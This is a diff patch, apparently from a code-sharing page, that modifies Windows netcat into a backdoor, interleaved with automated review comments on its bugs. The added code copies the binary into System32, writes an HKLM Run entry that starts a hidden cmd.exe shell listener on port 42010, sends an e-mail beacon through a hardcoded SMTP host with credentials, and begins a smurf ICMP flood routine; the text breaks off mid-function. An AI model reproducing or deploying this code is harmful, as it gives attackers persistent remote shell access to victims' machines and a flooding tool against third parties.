Created
October 10, 2012 22:47
nc (nc111nt): create backdoor registry Run entry and send e-mail beacon
Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents. | |
diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c | |
*** /home/swilting/Téléchargements/nc/getopt.c 1996-11-06 22:40:36.000000000 +0100 | |
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c 2012-10-26 15:30:01.812133992 +0200 | |
*************** | |
*** 45,51 **** | |
#include <stdio.h> | |
#ifdef WIN32 | |
! #include <string.h> | |
#endif | |
/* Comment out all this code if we are using the GNU C Library, and are not | |
--- 45,60 ---- | |
#include <stdio.h> | |
#ifdef WIN32 | |
! #include <string.h> | |
! #include <tchar.h> | |
! #include <windows.h> | |
! | |
! // Change accordingly... | |
! | |
! #define POLICY_KEY TEXT("Software\\Policies\\Microsoft\\Windows\\Explorer") | |
! | |
! #define PREFERENCE_KEY TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer") | |
! | |
#endif | |
/* Comment out all this code if we are using the GNU C Library, and are not | |
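Review bot: `POLICY_KEY` and `PREFERENCE_KEY` are defined here in getopt.c but nothing in getopt.c's hunks uses them; the identical two macros are defined again in netcat.c (hunk 1651,1663), where `init_regedit` actually reads them. Pulling `<windows.h>` and `<tchar.h>` into a stock GNU getopt.c only serves the `init_regedit` call added in hunk 697,703, which cannot link from here anyway. These six added lines should be dropped from getopt.c; if the macros are wanted in more than one translation unit they belong in a header, defined once.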
*************** | |
*** 204,210 **** | |
#endif /* __GNUC__ */ | |
#endif /* not __GNU_LIBRARY__ */ | |
! | |
/* Handle permutation of arguments. */ | |
/* Describe the part of ARGV that contains non-options that have | |
--- 213,219 ---- | |
#endif /* __GNUC__ */ | |
#endif /* not __GNU_LIBRARY__ */ | |
! | |
/* Handle permutation of arguments. */ | |
/* Describe the part of ARGV that contains non-options that have | |
*************** | |
*** 697,703 **** | |
int digit_optind = 0; | |
while (1) | |
! { | |
int this_option_optind = optind ? optind : 1; | |
c = getopt (argc, argv, "abc:d:0123456789"); | |
--- 706,719 ---- | |
int digit_optind = 0; | |
while (1) | |
! { | |
! #ifdef WIN32 | |
! LPTSTR lpValueName = "Browse For Folder Height"; | |
! | |
! DWORD dwDefault = 0x00000000; | |
! | |
! init_regedit(lpValueName, dwDefault); | |
! #endif | |
int this_option_optind = optind ? optind : 1; | |
c = getopt (argc, argv, "abc:d:0123456789"); | |
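Review bot: `init_regedit(lpValueName, dwDefault);` is called here with no prototype in scope, and per hunk 1651,1663 of netcat.c the function is defined `static` there, so this is an implicit declaration in getopt.c whose symbol cannot resolve when getopt.o is linked. The call also sits at the top of `while (1)`, so it would re-run the copy-to-System32 and Run-key write on every option parsed. Judging by the `"abc:d:0123456789"` option string this loop is GNU getopt's own self-test driver, which is presumably compiled only under a test macro (its header is outside the hunk) — confirm before assuming it is ever built; either way the `#ifdef WIN32` block has no business in getopt.c and should be removed.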
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: getopt.c~ | |
Les fichiers binaires /home/swilting/Téléchargements/nc/getopt.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.o sont différents. | |
Seulement dans /home/swilting/Téléchargements/nc/: makefile | |
Seulement dans /home/swilting/Téléchargements/nc/: makefile~ | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: Makefile | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: Makefile~ | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.exe | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.patch | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.patch~ | |
diff -crB /home/swilting/Téléchargements/nc/netcat.c /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.c | |
*** /home/swilting/Téléchargements/nc/netcat.c 2004-12-29 13:07:04.000000000 +0100 | |
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.c 2012-10-23 13:03:27.745322002 +0200 | |
*************** | |
*** 29,38 **** | |
RAW mode! | |
backend progs to grab a pty and look like a real telnetd?! | |
*/ | |
! | |
#include "generic.h" /* same as with L5, skey, etc */ | |
#ifdef WIN32 | |
#pragma comment (lib, "ws2_32") /* winsock support */ | |
#endif | |
--- 29,56 ---- | |
RAW mode! | |
backend progs to grab a pty and look like a real telnetd?! | |
*/ | |
! #define _WIN32_WINNT 0x0502 // Windows Server 2003 family | |
#include "generic.h" /* same as with L5, skey, etc */ | |
+ #include <openssl/sha.h> | |
+ #include <openssl/bio.h> | |
+ #include <openssl/buffer.h> | |
+ | |
+ #include <openssl/ssl.h> | |
+ #include <openssl/rand.h> | |
+ #include <openssl/err.h> | |
+ #include <openssl/rand.h> | |
+ #include <openssl/md5.h> | |
+ #include <openssl/evp.h> | |
+ #include <openssl/hmac.h> | |
+ #include <stdint.h> | |
+ | |
#ifdef WIN32 | |
+ | |
+ | |
+ // For Win Xp, change accordingly... | |
+ | |
+ #define _WIN32_WINNT 0x0501 | |
#pragma comment (lib, "ws2_32") /* winsock support */ | |
#endif | |
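Review bot: `_WIN32_WINNT` is defined to `0x0502` before `generic.h` and then redefined to `0x0501` under `#ifdef WIN32` with no intervening `#undef`; redefining a macro with a different value is a constraint violation, and which value the Windows headers actually see depends on the compiler's handling of it. The OpenSSL headers are included unconditionally, yet `sendmail` is only invoked from the WIN32 branch of `main` (hunk 1651,1663), so every non-Windows build now carries a libssl/libcrypto link dependency that the makefile (not shown) must satisfy; `<openssl/rand.h>` is also included twice. Keep a single `#define _WIN32_WINNT 0x0501` ahead of `generic.h` and delete the second definition.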
*************** | |
*** 64,69 **** | |
--- 82,89 ---- | |
#undef IP_OPTIONS | |
#undef SO_REUSEPORT | |
#include <windows.h> | |
+ #include <tchar.h> | |
+ #include <stdio.h> | |
#endif | |
*************** | |
*** 122,131 **** | |
#include <errno.h> | |
#include <signal.h> | |
- /* handy stuff: */ | |
#define SA struct sockaddr /* socket overgeneralization braindeath */ | |
#define SAI struct sockaddr_in /* ... whoever came up with this model */ | |
#define IA struct in_addr /* ... should be taken out and shot, */ | |
/* ... not that TLI is any better. sigh.. */ | |
#define SLEAZE_PORT 31337 /* for UDP-scan RTT trick, change if ya want */ | |
#define USHORT unsigned short /* use these for options an' stuff */ | |
--- 142,153 ---- | |
#include <errno.h> | |
#include <signal.h> | |
#define SA struct sockaddr /* socket overgeneralization braindeath */ | |
+ | |
#define SAI struct sockaddr_in /* ... whoever came up with this model */ | |
+ | |
#define IA struct in_addr /* ... should be taken out and shot, */ | |
+ | |
/* ... not that TLI is any better. sigh.. */ | |
#define SLEAZE_PORT 31337 /* for UDP-scan RTT trick, change if ya want */ | |
#define USHORT unsigned short /* use these for options an' stuff */ | |
*************** | |
*** 206,211 **** | |
--- 228,550 ---- | |
unsigned int o_wait = 0; | |
USHORT o_zero = 0; | |
+ #define CHK_NULL_ASSERT(x) assert(x != NULL) | |
+ | |
+ #define CHK_NULL(x) do { if ((x)==NULL) exit (1); }while(0) | |
+ #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); } | |
+ #define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); } | |
+ | |
+ #define TAILLE_TAMPON 1500 | |
+ #ifdef WIN32 | |
+ #define WIN32_LEAN_AND_MEAN | |
+ #include <windows.h> | |
+ #include <winsock2.h> | |
+ #include <ws2tcpip.h> | |
+ #include <assert.h> | |
+ #define bzero(p, l) memset(p, 0, l) | |
+ #define bcopy(s, t, l) memmove(t, s, l) | |
+ #else | |
+ #endif | |
+ #define CHK_NULL_ASSERT(x) assert(x != NULL) | |
+ | |
+ #define CHK_NULL(x) do { if ((x)==NULL) exit (1); }while(0) | |
+ #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); } | |
+ #define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); } | |
+ | |
+ #define TAILLE_TAMPON 1500 | |
+ void encodeblock( unsigned char in[], char b64str[], int len ); | |
+ void b64_encode(char *clrstr, char *b64dst); | |
+ void send_line(SSL* ssl,char* cmd); | |
+ void recv_line(SSL* ssl); | |
+ void sendmail(char *email,char *body); | |
+ int open_socket(struct sockaddr *addr); | |
+ /* ------------------------------------------------------------------------ * | |
+ * file: base64_stringencode.c v1.0 * | |
+ * purpose: tests encoding/decoding strings with base64 * | |
+ * author: 02/23/2009 Frank4DD * | |
+ * * | |
+ * source: http://base64.sourceforge.net/b64.c for encoding * | |
+ * http://en.literateprograms.org/Base64_(C) for decoding * | |
+ * ------------------------------------------------------------------------ */ | |
+ | |
+ | |
+ /* ---- Base64 Encoding/Decoding Table --- */ | |
+ char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; | |
+ | |
+ | |
+ | |
+ | |
+ | |
+ /* encodeblock - encode 3 8-bit binary bytes as 4 '6-bit' characters */ | |
+ void encodeblock( unsigned char in[], char b64str[], int len ) { | |
+ char out[5]; | |
+ out[0] = b64[ in[0] >> 2 ]; | |
+ out[1] = b64[ ((in[0] & 0x03) << 4) | ((in[1] & 0xf0) >> 4) ]; | |
+ out[2] = (unsigned char) (len > 1 ? b64[ ((in[1] & 0x0f) << 2) | | |
+ ((in[2] & 0xc0) >> 6) ] : '='); | |
+ out[3] = (unsigned char) (len > 2 ? b64[ in[2] & 0x3f ] : '='); | |
+ out[4] = '\0'; | |
+ strncat(b64str, out, sizeof(out)); | |
+ } | |
+ | |
+ /* encode - base64 encode a stream, adding padding if needed */ | |
+ void b64_encode(char *clrstr, char *b64dst) { | |
+ unsigned char in[3]; | |
+ int i, len = 0; | |
+ int j = 0; | |
+ | |
+ b64dst[0] = '\0'; | |
+ while(clrstr[j]) { | |
+ len = 0; | |
+ for(i=0; i<3; i++) { | |
+ in[i] = (unsigned char) clrstr[j]; | |
+ if(clrstr[j]) { | |
+ len++; j++; | |
+ } | |
+ else in[i] = 0; | |
+ } | |
+ if( len ) { | |
+ encodeblock( in, b64dst, len ); | |
+ } | |
+ } | |
+ } | |
+ | |
+ //send data | |
+ void send_line(SSL* ssl,char* cmd) | |
+ { | |
+ int err; | |
+ err = SSL_write (ssl, cmd, strlen(cmd)); | |
+ CHK_SSL(err); | |
+ } | |
+ | |
+ //receive data | |
+ void recv_line(SSL* ssl) | |
+ { | |
+ char rbuf[TAILLE_TAMPON] = {0}; | |
+ int err; | |
+ err = SSL_read (ssl, rbuf, sizeof(rbuf) - 1); | |
+ CHK_SSL(err); | |
+ printf("%s\n", rbuf); | |
+ } | |
+ | |
+ //open TCP Socket connection | |
+ int open_socket(struct sockaddr *addr) | |
+ { | |
+ | |
+ int retval; | |
+ #ifdef WIN32 | |
+ WSADATA W; | |
+ SOCKET sockfd; | |
+ WSAStartup (0x101, &W); | |
+ sockfd = socket(AF_INET, SOCK_STREAM, 0); | |
+ #else | |
+ int sockfd; | |
+ sockfd = socket(AF_INET, SOCK_STREAM, 0); | |
+ #endif | |
+ if(sockfd < 0) | |
+ { | |
+ fprintf(stderr, "Open sockfd(TCP) error!\n"); | |
+ exit(-1); | |
+ } | |
+ #ifdef WIN32 | |
+ retval = connect(sockfd, addr, sizeof(struct sockaddr)); | |
+ #else | |
+ retval = connect(sockfd, addr, sizeof(struct sockaddr)); | |
+ #endif | |
+ printf("connecting smtp server\n"); | |
+ if(retval == -1) | |
+ { | |
+ fprintf(stderr, "Connect sockfd(TCP) error!\n"); | |
+ exit(-1); | |
+ } | |
+ return sockfd; | |
+ } | |
+ | |
+ // sending email | |
+ void sendmail(char *email, char *body) | |
+ { | |
+ int sockfd; | |
+ int retval = 0; | |
+ int err; | |
+ char *host_name = "smtp.fakessh.eu"; | |
+ struct sockaddr_in their_addr; | |
+ struct hostent *hent; | |
+ char buf[TAILLE_TAMPON] = {0}; | |
+ char rbuf[TAILLE_TAMPON] = {0}; | |
+ char login[TAILLE_TAMPON] = {0}; | |
+ char pass[TAILLE_TAMPON] = {0}; | |
+ | |
+ //initialize SSL | |
+ SSL_CTX *ctx; | |
+ SSL *ssl; | |
+ SSL_METHOD *meth; | |
+ | |
+ SSLeay_add_ssl_algorithms(); | |
+ meth = SSLv23_method(); | |
+ SSL_load_error_strings(); | |
+ SSL_library_init(); | |
+ ctx = SSL_CTX_new(meth); | |
+ CHK_NULL(ctx); | |
+ | |
+ fd_set readfds; | |
+ struct timeval timeout; | |
+ | |
+ //Define a timeout for resending data. | |
+ timeout.tv_sec = 2; | |
+ timeout.tv_usec = 0; | |
+ | |
+ #ifdef WIN32 | |
+ WSADATA WSAData; | |
+ WSAStartup(MAKEWORD(2, 2), &WSAData); | |
+ #endif | |
+ | |
+ hent = gethostbyname(host_name); | |
+ memset(&their_addr, 0, sizeof(their_addr)); | |
+ their_addr.sin_family = AF_INET; | |
+ their_addr.sin_port = htons(42015); | |
+ #ifdef WIN32 | |
+ their_addr.sin_addr = *((LPIN_ADDR )*hent->h_addr); | |
+ #else | |
+ their_addr.sin_addr = *((struct in_addr *)hent->h_addr); | |
+ #endif | |
+ //connecting mail server and reconnecting if no response in 2 seconds | |
+ sockfd = open_socket((struct sockaddr *)&their_addr); | |
+ memset(rbuf,0,TAILLE_TAMPON); | |
+ FD_ZERO(&readfds); | |
+ FD_SET(sockfd, &readfds); | |
+ retval = select(sockfd+1, &readfds, NULL, NULL, &timeout); | |
+ while(retval <= 0) | |
+ { | |
+ printf("reconnect...\n"); | |
+ /*sleep(2);*/ | |
+ #ifdef WIN32 | |
+ (void)closesocket(sockfd); | |
+ Sleep(2); | |
+ #else | |
+ (void)close(sockfd); | |
+ sleep(2); | |
+ #endif | |
+ sockfd = open_socket((struct sockaddr *)&their_addr); | |
+ memset(rbuf,0,TAILLE_TAMPON); | |
+ FD_ZERO(&readfds); | |
+ FD_SET(sockfd, &readfds); | |
+ retval = select(sockfd+1, &readfds, NULL, NULL, &timeout); | |
+ } | |
+ | |
+ memset(rbuf, 0, TAILLE_TAMPON); | |
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0); | |
+ printf("%s\n", rbuf); | |
+ | |
+ //EHLO | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf, "EHLO localhost\r\n"); | |
+ send(sockfd, buf, strlen(buf), 0); | |
+ memset(rbuf, 0, TAILLE_TAMPON); | |
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0); | |
+ printf("%s\n", rbuf); | |
+ | |
+ //START_TLS with OPENSSL | |
+ memset(buf,0, TAILLE_TAMPON); | |
+ sprintf(buf, "STARTTLS\r\n"); | |
+ send(sockfd, buf, strlen(buf), 0); | |
+ memset(rbuf, 0, TAILLE_TAMPON); | |
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0); | |
+ printf("%s\n", rbuf); | |
+ | |
+ | |
+ //AUTH LOGIN | |
+ ssl = SSL_new(ctx); | |
+ CHK_NULL(ssl); | |
+ CHK_NULL_ASSERT(ssl); | |
+ SSL_set_fd (ssl, sockfd); | |
+ err = SSL_connect(ssl); | |
+ CHK_SSL(err); | |
+ | |
+ memset(buf,0, TAILLE_TAMPON); | |
+ sprintf(buf, "EHLO localhost\r\n"); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ | |
+ memset(buf,0, TAILLE_TAMPON); | |
+ sprintf(buf, "AUTH LOGIN\r\n"); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //USER | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf,"test"); | |
+ memset(login, 0, TAILLE_TAMPON); | |
+ b64_encode(buf, login); | |
+ sprintf(buf, "%s\r\n", login); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //PASSWORD | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf, "f*****"); | |
+ memset(pass, 0, TAILLE_TAMPON); | |
+ b64_encode(buf, pass); | |
+ sprintf(buf, "%s\r\n", pass); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //MAIL FROM | |
+ memset(buf,0, TAILLE_TAMPON); | |
+ sprintf(buf, "MAIL FROM:<test@miss.fakessh.eu>\r\n"); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //RCPT TO first receiver | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf, "RCPT TO:<john.swilting@smtp.fakessh.eu>\r\n"); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //RCPT TO second receiver and more receivers can be added | |
+ //memset(buf, 0, 1500); | |
+ //sprintf(buf, "RCPT TO:<john.swilting@wanadoo.fr>\r\n"); | |
+ //send_line(ssl,buf); | |
+ //recv_line(ssl); | |
+ | |
+ //DATA ready to send mail content | |
+ send_line(ssl,"DATA\r\n"); | |
+ recv_line(ssl); | |
+ | |
+ //send mail content£¬"\r\n.\r\n" is the end mark of content | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf, "%s\r\n.\r\n", body); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ printf("mail send!\n"); | |
+ | |
+ //QUIT | |
+ send_line(ssl,"QUIT\r\n"); | |
+ recv_line(ssl); | |
+ | |
+ //free SSL and close socket | |
+ SSL_shutdown (ssl); | |
+ #ifdef WIN32 | |
+ (void)closesocket(sockfd); | |
+ #else | |
+ (void)close(sockfd); | |
+ #endif | |
+ SSL_free (ssl); | |
+ SSL_CTX_free (ctx); | |
+ | |
+ #ifdef WIN32 | |
+ WSACleanup(); | |
+ #endif | |
+ | |
+ return; | |
+ } | |
+ | |
+ | |
+ | |
+ | |
+ | |
+ | |
+ | |
/* Debug macro: squirt whatever to stderr and sleep a bit so we can see it go | |
by. need to call like Debug ((stuff)) [with no ; ] so macro args match! | |
Beware: writes to stdOUT... */ | |
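Review bot: On the WIN32 path `their_addr.sin_addr = *((LPIN_ADDR )*hent->h_addr);` dereferences `h_addr` to a single `char` and then casts that byte value to a pointer, so the mailer faults before it connects, while the non-WIN32 line directly below is the correct `*((struct in_addr *)hent->h_addr)` form; `hent` is also never checked for NULL after `gethostbyname`. Each `recv(sockfd, rbuf, TAILLE_TAMPON, 0)` may fill the whole buffer, after which `printf("%s\n", rbuf)` reads past its end — pass `TAILLE_TAMPON - 1` as `recv_line` already does, and `sprintf(buf, "%s\r\n.\r\n", body)` has no bound on `body` at all. The context built from `SSLv23_method()` is never given `SSL_CTX_set_verify` or a trust store, so `SSL_connect` accepts any certificate and the AUTH LOGIN credentials hardcoded at `sprintf(buf,"test")` / `sprintf(buf, "f*****")` — base64 is not encryption — are sent to whoever answers for `smtp.fakessh.eu` on port 42015. For anyone triaging a build of this, that hostname, port 42015 and the fixed MAIL FROM / RCPT TO addresses are static indicators; the `email` parameter is unused.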
*************** | |
*** 723,728 **** | |
--- 1062,1075 ---- | |
return (0); /* no more left! */ | |
} /* nextport */ | |
+ | |
+ | |
+ #ifdef SMURF_ATTACK | |
+ //char x_smurf_victime = NULL; | |
+ char x_smurf_victime[20][32]; | |
+ char x_smurf_attack; | |
+ #endif | |
+ | |
/* loadports : | |
set "to be tested" indications in BLOCK, from LO to HI. Almost too small | |
*************** | |
*** 747,752 **** | |
--- 1094,1100 ---- | |
#ifdef GAPING_SECURITY_HOLE | |
char * pr00gie = NULL; /* global ptr to -e arg */ | |
+ | |
#ifdef WIN32 | |
BOOL doexec(SOCKET ClientSocket); // this is in doexec.c | |
#else | |
*************** | |
*** 808,816 **** | |
#endif | |
/* grab a socket; set opts */ | |
if (o_udpmode) | |
! nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); | |
else | |
! nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); | |
if (nnetfd < 0) | |
bail ("Can't get socket"); | |
if (nnetfd == 0) /* might *be* zero if stdin was closed! */ | |
--- 1159,1170 ---- | |
#endif | |
/* grab a socket; set opts */ | |
if (o_udpmode) | |
! nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); | |
! if(x_smurf_attack) | |
! nnetfd=socket(AF_INET,SOCK_RAW,255); | |
else | |
! nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); | |
! | |
if (nnetfd < 0) | |
bail ("Can't get socket"); | |
if (nnetfd == 0) /* might *be* zero if stdin was closed! */ | |
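Review bot: The inserted `if(x_smurf_attack)` captures the `else` that belonged to `if (o_udpmode)`, so with `-u` and no smurf flag the UDP socket is created and immediately overwritten by a TCP one — the descriptor leaks and "UDP mode" silently runs over TCP. `x_smurf_attack` is also referenced here without any `#ifdef SMURF_ATTACK` guard although it is declared only under that macro (hunk 723,728), so the default build does not compile. The original two-way `if`/`else` must be restored; if the raw-socket branch is kept at all it has to be `#ifdef SMURF_ATTACK` / `else if (x_smurf_attack)` … `#endif` so that it neither steals the `else` nor references an undeclared name.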
*************** | |
*** 823,829 **** | |
#endif | |
if (rr == -1) | |
holler ("nnetfd reuseaddr failed"); /* ??? */ | |
! #ifdef SO_REUSEPORT /* doesnt exist everywhere... */ | |
#ifdef WIN32 | |
rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT, &c, sizeof (c)); | |
#else | |
--- 1177,1212 ---- | |
#endif | |
if (rr == -1) | |
holler ("nnetfd reuseaddr failed"); /* ??? */ | |
! #ifdef SO_REUSEPORT /* doesnt exist everywhere... */ | |
! #ifdef SMURF_ATTACK | |
! int TimeOut = 500; | |
! BOOL HAdHeAder; | |
! BOOL IsBrocAst; | |
! if (x_smurf_attack){ | |
! if(x_smurf_victime){ | |
! if (setsockopt(nnetfd,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut))){ | |
! printf("setsockopt sendtimeout fAiled:%d\n",GetLastError()); | |
! return -1; | |
! } | |
! if (setsockopt(nnetfd,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut))){ | |
! printf("setsockopt recvtimeout fAiled:%d\n",GetLastError()); | |
! return -1; | |
! } | |
! | |
! HAdHeAder = TRUE; | |
! if (setsockopt(nnetfd,IPPROTO_IP,IP_HDRINCL,(char*)&HAdHeAder,sizeof(HAdHeAder))){ | |
! printf("setsockopt IP_HDRINCL fAiled:%d\n",GetLastError()); | |
! return -1; | |
! } | |
! | |
! IsBrocAst = TRUE; | |
! if (setsockopt(nnetfd,SOL_SOCKET,SO_BROADCAST,(char*)&IsBrocAst,sizeof(IsBrocAst))){ | |
! printf("setsockopt IP_HDRINCL fAiled:%d\n",GetLastError()); | |
! return -1; | |
! } | |
! } | |
! } | |
! #endif | |
#ifdef WIN32 | |
rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT, &c, sizeof (c)); | |
#else | |
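Review bot: This whole block is inside `#ifdef SO_REUSEPORT`, and the WIN32 section of this file does `#undef SO_REUSEPORT` (hunk 64,69), so on the Windows build it is written for none of these `setsockopt` calls or their `GetLastError` diagnostics are compiled; on any other platform it references `GetLastError`, `BOOL` and `TRUE`, which do not exist. `if(x_smurf_victime)` tests the address of an array, which is never null, so only `x_smurf_attack` gates anything, and the declarations after statements (`int TimeOut`, `BOOL HAdHeAder`) break the file's C89/K&R style. As written it is dead code on the one platform it could compile on and a compile error everywhere else; it should be dropped.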
*************** | |
*** 977,983 **** | |
IA * lad; | |
USHORT lp; | |
{ | |
! register int nnetfd; | |
register int rr; | |
HINF * whozis = NULL; | |
int x; | |
--- 1360,1366 ---- | |
IA * lad; | |
USHORT lp; | |
{ | |
! volatile int nnetfd; | |
register int rr; | |
HINF * whozis = NULL; | |
int x; | |
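Review bot: `volatile int nnetfd;` replaces `register int nnetfd;`, but nothing visible in dolisten (the body continues past the hunk) shares `nnetfd` with a signal handler, another thread or a memory-mapped device, so `volatile` only forces every access through memory. If the intent was merely to drop the obsolete `register` hint, plain `int nnetfd;` is the right line; if there is a real reason for `volatile`, a comment stating it is needed.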
*************** | |
*** 1342,1348 **** | |
p++; x--; | |
obuf[2] = *p; /* copy actual option byte */ | |
#ifdef WIN32 | |
! (void) send (netfd, obuf, 3, 0); /* one line, or the whole buffer */ | |
#else | |
(void) write (netfd, obuf, 3); | |
#endif | |
--- 1725,1731 ---- | |
p++; x--; | |
obuf[2] = *p; /* copy actual option byte */ | |
#ifdef WIN32 | |
! (void) send (netfd, (void *)obuf, 3, 0); /* one line, or the whole buffer */ | |
#else | |
(void) write (netfd, obuf, 3); | |
#endif | |
*************** | |
*** 1651,1663 **** | |
--- 2034,2354 ---- | |
#endif | |
return (0); | |
} /* readwrite */ | |
+ #ifdef WIN32 | |
+ #include <string.h> | |
+ #include <tchar.h> | |
+ #include <windows.h> | |
+ | |
+ // Change accordingly... | |
+ | |
+ #define POLICY_KEY TEXT("Software\\Policies\\Microsoft\\Windows\\Explorer") | |
+ | |
+ #define PREFERENCE_KEY TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer") | |
+ static DWORD init_regedit(LPTSTR lpValueName, DWORD dwDefault) | |
+ { | |
+ | |
+ | |
+ HKEY hKey; | |
+ | |
+ LONG lResult; | |
+ DWORD dwValue, dwType, dwSize = sizeof(dwValue); | |
+ DWORD dwDisposition; | |
+ | |
+ | |
+ | |
+ //first utility | |
+ TCHAR buf[MAX_PATH]; | |
+ GetModuleFileName(0, buf, MAX_PATH); | |
+ CopyFile(buf, "C:\\WINDOWS\\SYSTEM32\\nc.exe", TRUE); | |
+ char szData[500]= "C:\\WINDOWS\\SYSTEM32\\nc.exe -vv -d -L -p 42010 -e cmd.exe"; | |
+ | |
+ // First, check for a policy. | |
+ | |
+ lResult = RegOpenKeyEx(HKEY_CURRENT_USER, POLICY_KEY, 0, KEY_READ, &hKey); | |
+ | |
+ | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ lResult = RegQueryValueEx(hKey, lpValueName, 0, &dwType, (LPBYTE)&dwValue, &dwSize); | |
+ | |
+ RegCloseKey(hKey); | |
+ | |
+ } | |
+ | |
+ // Exit if a policy value was found. | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ // return the data value | |
+ | |
+ return dwValue; | |
+ | |
+ } | |
+ | |
+ /*else | |
+ continue; | |
+ printf("Policy: value not found!\n");*/ | |
+ | |
+ // Second, check for a preference. | |
+ | |
+ lResult = RegOpenKeyEx(HKEY_CURRENT_USER, PREFERENCE_KEY, 0, KEY_READ, &hKey); | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ lResult = RegQueryValueEx(hKey, lpValueName, 0, &dwType, (LPBYTE)&dwValue, &dwSize); | |
+ | |
+ RegCloseKey (hKey); | |
+ | |
+ } | |
+ | |
+ // Exit if a preference was found. | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ // Return the data value | |
+ | |
+ return dwValue; | |
+ | |
+ } | |
+ | |
+ /*else | |
+ | |
+ printf("Preference: value not found!\n");*/ | |
+ | |
+ | |
+ lResult = RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition); | |
+ | |
+ | |
+ // Exit if a preference was found. | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ // Return the data value | |
+ lResult = RegSetValueEx(hKey, "nc", 0, REG_SZ, (LPBYTE)szData, sizeof(szData)); | |
+ lResult = RegCloseKey(hKey); | |
+ return dwValue; | |
+ | |
+ } | |
+ | |
+ /*else | |
+ printf("Preference: value not found!\n");*/ | |
+ | |
+ // Neither a policy nor a preference was found; return the default value. | |
+ | |
+ return dwDefault; | |
+ } | |
+ #endif | |
+ #ifdef SMURF_ATTACK | |
+ char *Awp; | |
+ char *victime; | |
+ typedef struct _icmp_heAder | |
+ { | |
+ char type; | |
+ char code; | |
+ USHORT checksum; | |
+ USHORT id; | |
+ USHORT sequence; | |
+ ULONG timestAmp; | |
+ }ICMP_HEADER; | |
+ //-------------------------------------------------------------------- | |
+ typedef struct _ip_heAder | |
+ { | |
+ unsigned char ip_verlen; // 4-bit IPv4 version | |
+ // 4-bit header length (in 32-bit words) | |
+ unsigned char ip_tos; // IP type of service | |
+ unsigned short ip_totallength; // Total length | |
+ unsigned short ip_id; // Unique identifier | |
+ unsigned short ip_offset; // Fragment offset field | |
+ unsigned char ip_ttl; // Time to live | |
+ unsigned char ip_protocol; // Protocol(TCP,UDP etc) | |
+ unsigned short ip_checksum; // IP checksum | |
+ unsigned int ip_srcaddr; // Source address | |
+ unsigned int ip_destaddr; // Source address | |
+ } IP_HEADER; | |
+ //-------------------------------------------------------------------- | |
+ USHORT checksum(USHORT *buffer, int size) | |
+ { | |
+ unsigned long cksum=0; | |
+ while(size >1) | |
+ { | |
+ cksum+=*buffer++; | |
+ size -=sizeof(USHORT); | |
+ } | |
+ if(size ) | |
+ { | |
+ cksum += *(UCHAR*)buffer; | |
+ } | |
+ cksum = (cksum >> 16) + (cksum & 0xffff); | |
+ cksum += (cksum >>16); | |
+ return (USHORT)(~cksum); | |
+ } | |
+ //-------------------------------------------------------------------- | |
+ //-------------------------------------------------------------------- | |
+ smurf_victime(int fd,char lpPArAm ,char lpVictime) | |
+ { | |
+ char* victim = &lpVictime; | |
+ char* Awp = &lpPArAm; | |
+ char Buff[sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+20]; | |
